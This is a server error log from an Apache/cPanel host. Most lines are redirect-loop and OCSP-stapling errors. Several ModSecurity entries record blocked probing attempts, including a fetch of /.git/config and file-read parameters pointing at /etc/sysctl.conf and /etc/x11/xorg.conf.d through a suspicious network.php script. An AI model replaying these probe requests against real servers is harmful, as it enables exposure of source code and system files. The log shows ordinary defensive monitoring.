[Mon May 11 13:27:24.196664 2026] [core:error] [pid 1319886:tid 1319902] [client 20.151.0.198:52058] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:27.251567 2026] [core:error] [pid 1320398:tid 1320409] [client 20.151.0.198:48511] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:27.251599 2026] [core:error] [pid 1320398:tid 1320409] [client 20.151.0.198:48511] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:28.011067 2026] [security2:error] [pid 1320398:tid 1320408] [client 93.174.93.12:60000] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "303"] [id "920280"] [rev "2"] [msg "Request Missing a Host Header"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cpanel.totalcloud.fr"] [uri "/"] [unique_id "agG9IOJEyNRN152ArORjqwAAAEg"]
[Mon May 11 13:27:30.197476 2026] [core:error] [pid 1319886:tid 1319919] [client 20.151.0.198:57591] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:30.197530 2026] [core:error] [pid 1319886:tid 1319919] [client 20.151.0.198:57591] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:30.440393 2026] [security2:error] [pid 1320674:tid 1320697] [client 34.76.31.227:56752] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agG9IqO9RdIr1DwxYR1tdgAAAMc"]
[Mon May 11 13:27:30.441540 2026] [security2:error] [pid 1320674:tid 1320697] [client 34.76.31.227:56752] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agG9IqO9RdIr1DwxYR1tdgAAAMc"]
[Mon May 11 13:27:30.442139 2026] [security2:error] [pid 1320674:tid 1320697] [client 34.76.31.227:56752] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agG9IqO9RdIr1DwxYR1tdgAAAMc"]
[Mon May 11 13:27:33.822203 2026] [security2:error] [pid 1319885:tid 1319889] [client 216.73.216.110:1837] ModSecurity: Warning. Matched phrase "etc/sysctl.conf" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/sysctl.conf found within ARGS:filesrc: /etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agG9JVchVQ3tCn0m9OoyaQAAAQE"]
[Mon May 11 13:27:33.822803 2026] [security2:error] [pid 1319885:tid 1319889] [client 216.73.216.110:1837] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agG9JVchVQ3tCn0m9OoyaQAAAQE"]
[Mon May 11 13:27:33.911705 2026] [security2:error] [pid 1319885:tid 1319889] [client 216.73.216.110:1837] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agG9JVchVQ3tCn0m9OoyaQAAAQE"]
[Mon May 11 13:27:34.471201 2026] [core:error] [pid 1320398:tid 1320401] [client 20.151.0.198:43404] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:34.471336 2026] [core:error] [pid 1320398:tid 1320401] [client 20.151.0.198:43404] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:37.368465 2026] [core:error] [pid 1320674:tid 1320699] [client 20.151.0.198:14339] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:37.368491 2026] [core:error] [pid 1320674:tid 1320699] [client 20.151.0.198:14339] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:43.168214 2026] [core:error] [pid 1319885:tid 1319930] [client 20.151.0.198:14368] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:43.168252 2026] [core:error] [pid 1319885:tid 1319930] [client 20.151.0.198:14368] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:50.402676 2026] [security2:error] [pid 1320674:tid 1320706] [client 216.73.216.110:20900] ModSecurity: Warning. Matched phrase "etc/x11/xorg.conf" at ARGS:path. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/x11/xorg.conf found within ARGS:path: /etc/x11/xorg.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agG9NqO9RdIr1DwxYR1tpQAAANE"]
[Mon May 11 13:27:50.403424 2026] [security2:error] [pid 1320674:tid 1320706] [client 216.73.216.110:20900] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agG9NqO9RdIr1DwxYR1tpQAAANE"]
[Mon May 11 13:27:50.460731 2026] [security2:error] [pid 1320674:tid 1320706] [client 216.73.216.110:20900] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agG9NqO9RdIr1DwxYR1tpQAAANE"]
[Mon May 11 13:27:52.443341 2026] [core:error] [pid 1319885:tid 1319938] [client 20.151.0.198:43399] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:52.443379 2026] [core:error] [pid 1319885:tid 1319938] [client 20.151.0.198:43399] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:58.218413 2026] [core:error] [pid 1320398:tid 1320400] [client 20.151.0.198:48500] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:27:58.218443 2026] [core:error] [pid 1320398:tid 1320400] [client 20.151.0.198:48500] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:02.044462 2026] [core:error] [pid 1319886:tid 1319914] [client 20.151.0.198:57552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:02.044498 2026] [core:error] [pid 1319886:tid 1319914] [client 20.151.0.198:57552] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:02.163894 2026] [security2:error] [pid 1319953:tid 1319965] [client 122.51.236.174:59256] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.totalcloud.fr"] [uri "/"] [unique_id "agG9QuSQ-m-m0ukSShtcCAAAAUo"]
[Mon May 11 13:28:02.167050 2026] [autoindex:error] [pid 1319953:tid 1319965] [client 122.51.236.174:59256] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 13:28:03.878740 2026] [core:error] [pid 1320398:tid 1320406] [client 20.151.0.198:43432] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:03.879078 2026] [core:error] [pid 1320398:tid 1320406] [client 20.151.0.198:43432] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:05.971638 2026] [core:error] [pid 1319886:tid 1319913] [client 20.151.0.198:57543] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:05.971668 2026] [core:error] [pid 1319886:tid 1319913] [client 20.151.0.198:57543] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:08.112141 2026] [core:error] [pid 1319998:tid 1320002] [client 20.151.0.198:57557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:08.112188 2026] [core:error] [pid 1319998:tid 1320002] [client 20.151.0.198:57557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:10.250862 2026] [ssl:error] [pid 1320398:tid 1320412] (EAI 2)Name or service not known: [client 192.178.6.7:50679] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:28:10.250956 2026] [ssl:error] [pid 1320398:tid 1320412] AH01941: stapling_renew_response: responder error
[Mon May 11 13:28:10.684615 2026] [ssl:error] [pid 1319885:tid 1319925] (EAI 2)Name or service not known: [client 192.178.6.8:50422] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:28:10.684652 2026] [ssl:error] [pid 1319885:tid 1319925] AH01941: stapling_renew_response: responder error
[Mon May 11 13:28:11.192732 2026] [ssl:error] [pid 1319998:tid 1320006] (EAI 2)Name or service not known: [client 192.178.6.8:44244] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:28:11.192803 2026] [ssl:error] [pid 1319998:tid 1320006] AH01941: stapling_renew_response: responder error
[Mon May 11 13:28:11.341175 2026] [core:error] [pid 1319886:tid 1319905] [client 20.151.0.198:61938] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:11.341201 2026] [core:error] [pid 1319886:tid 1319905] [client 20.151.0.198:61938] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:12.189250 2026] [ssl:error] [pid 1320398:tid 1320402] (EAI 2)Name or service not known: [client 192.178.6.8:51913] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:28:12.189288 2026] [ssl:error] [pid 1320398:tid 1320402] AH01941: stapling_renew_response: responder error
[Mon May 11 13:28:13.234013 2026] [ssl:error] [pid 1319998:tid 1320013] (EAI 2)Name or service not known: [client 192.178.6.8:48459] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:28:13.234052 2026] [ssl:error] [pid 1319998:tid 1320013] AH01941: stapling_renew_response: responder error
[Mon May 11 13:28:13.623695 2026] [core:error] [pid 1320674:tid 1320697] [client 20.151.0.198:48450] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:13.623735 2026] [core:error] [pid 1320674:tid 1320697] [client 20.151.0.198:48450] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:14.307541 2026] [ssl:error] [pid 1320674:tid 1320709] (EAI 2)Name or service not known: [client 192.178.6.8:35891] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:28:14.307618 2026] [ssl:error] [pid 1320674:tid 1320709] AH01941: stapling_renew_response: responder error
[Mon May 11 13:28:16.497730 2026] [ssl:error] [pid 1319953:tid 1319970] (EAI 2)Name or service not known: [client 192.178.6.7:37316] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:28:16.497817 2026] [ssl:error] [pid 1319953:tid 1319970] AH01941: stapling_renew_response: responder error
[Mon May 11 13:28:17.404537 2026] [core:error] [pid 1319886:tid 1319901] [client 20.151.0.198:57587] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:17.404681 2026] [core:error] [pid 1319886:tid 1319901] [client 20.151.0.198:57587] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:19.471291 2026] [ssl:error] [pid 1320674:tid 1320698] (EAI 2)Name or service not known: [client 192.178.6.7:38200] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:28:19.471319 2026] [ssl:error] [pid 1320674:tid 1320698] AH01941: stapling_renew_response: responder error
[Mon May 11 13:28:20.370219 2026] [ssl:error] [pid 1319998:tid 1320007] (EAI 2)Name or service not known: [client 192.178.6.7:57669] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:28:20.370242 2026] [ssl:error] [pid 1319998:tid 1320007] AH01941: stapling_renew_response: responder error
[Mon May 11 13:28:20.404532 2026] [core:error] [pid 1319885:tid 1319892] [client 20.151.0.198:52078] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:20.404558 2026] [core:error] [pid 1319885:tid 1319892] [client 20.151.0.198:52078] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:21.451207 2026] [ssl:error] [pid 1320398:tid 1320404] (EAI 2)Name or service not known: [client 192.178.6.7:58765] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:28:21.451241 2026] [ssl:error] [pid 1320398:tid 1320404] AH01941: stapling_renew_response: responder error
[Mon May 11 13:28:25.383306 2026] [core:error] [pid 1319998:tid 1320012] [client 20.151.0.198:61907] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:25.383343 2026] [core:error] [pid 1319998:tid 1320012] [client 20.151.0.198:61907] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:27.677754 2026] [ssl:error] [pid 1319885:tid 1319893] (EAI 2)Name or service not known: [client 192.178.6.7:59878] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:28:27.677794 2026] [ssl:error] [pid 1319885:tid 1319893] AH01941: stapling_renew_response: responder error
[Mon May 11 13:28:28.569947 2026] [ssl:error] [pid 1320674:tid 1320693] (EAI 2)Name or service not known: [client 192.178.6.7:47442] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 13:28:28.569976 2026] [ssl:error] [pid 1320674:tid 1320693] AH01941: stapling_renew_response: responder error
[Mon May 11 13:28:30.567031 2026] [core:error] [pid 1319953:tid 1319961] [client 20.151.0.198:52058] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:30.567062 2026] [core:error] [pid 1319953:tid 1319961] [client 20.151.0.198:52058] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:34.224061 2026] [core:error] [pid 1319998:tid 1320001] [client 20.151.0.198:57592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:34.224088 2026] [core:error] [pid 1319998:tid 1320001] [client 20.151.0.198:57592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:34.751508 2026] [autoindex:error] [pid 1320674:tid 1320705] [client 150.109.96.100:40904] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 13:28:37.257919 2026] [core:error] [pid 1320398:tid 1320420] [client 20.151.0.198:61902] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:37.257949 2026] [core:error] [pid 1320398:tid 1320420] [client 20.151.0.198:61902] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:41.133924 2026] [core:error] [pid 1319998:tid 1320016] [client 20.151.0.198:52068] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:41.134056 2026] [core:error] [pid 1319998:tid 1320016] [client 20.151.0.198:52068] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:43.257002 2026] [core:error] [pid 1320674:tid 1320695] [client 20.151.0.198:57580] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:43.257041 2026] [core:error] [pid 1320674:tid 1320695] [client 20.151.0.198:57580] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:45.102442 2026] [core:error] [pid 1319998:tid 1320007] [client 20.151.0.198:52072] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:45.102478 2026] [core:error] [pid 1319998:tid 1320007] [client 20.151.0.198:52072] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:47.095438 2026] [core:error] [pid 1319886:tid 1319921] [client 20.151.0.198:52085] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:47.095467 2026] [core:error] [pid 1319886:tid 1319921] [client 20.151.0.198:52085] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:48.881921 2026] [core:error] [pid 1319953:tid 1319961] [client 20.151.0.198:52077] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:48.881946 2026] [core:error] [pid 1319953:tid 1319961] [client 20.151.0.198:52077] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:49.691003 2026] [core:error] [pid 1320674:tid 1320692] [client 20.151.0.198:52037] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:49.691038 2026] [core:error] [pid 1320674:tid 1320692] [client 20.151.0.198:52037] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:51.052737 2026] [core:error] [pid 1320674:tid 1320696] [client 20.151.0.198:14353] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:51.052771 2026] [core:error] [pid 1320674:tid 1320696] [client 20.151.0.198:14353] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:52.862281 2026] [core:error] [pid 1319953:tid 1319970] [client 20.151.0.198:57555] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:52.862318 2026] [core:error] [pid 1319953:tid 1319970] [client 20.151.0.198:57555] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:55.174350 2026] [core:error] [pid 1319953:tid 1319965] [client 20.151.0.198:43407] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:55.174381 2026] [core:error] [pid 1319953:tid 1319965] [client 20.151.0.198:43407] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:59.163510 2026] [core:error] [pid 1320398:tid 1320409] [client 20.151.0.198:14358] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:28:59.163543 2026] [core:error] [pid 1320398:tid 1320409] [client 20.151.0.198:14358] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:00.984709 2026] [core:error] [pid 1319953:tid 1319967] [client 20.151.0.198:48472] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:00.984742 2026] [core:error] [pid 1319953:tid 1319967] [client 20.151.0.198:48472] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:29:03.352216 2026] [core:error] [pid 1319885:tid 1319935] [client 20.151.0.198:52063] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
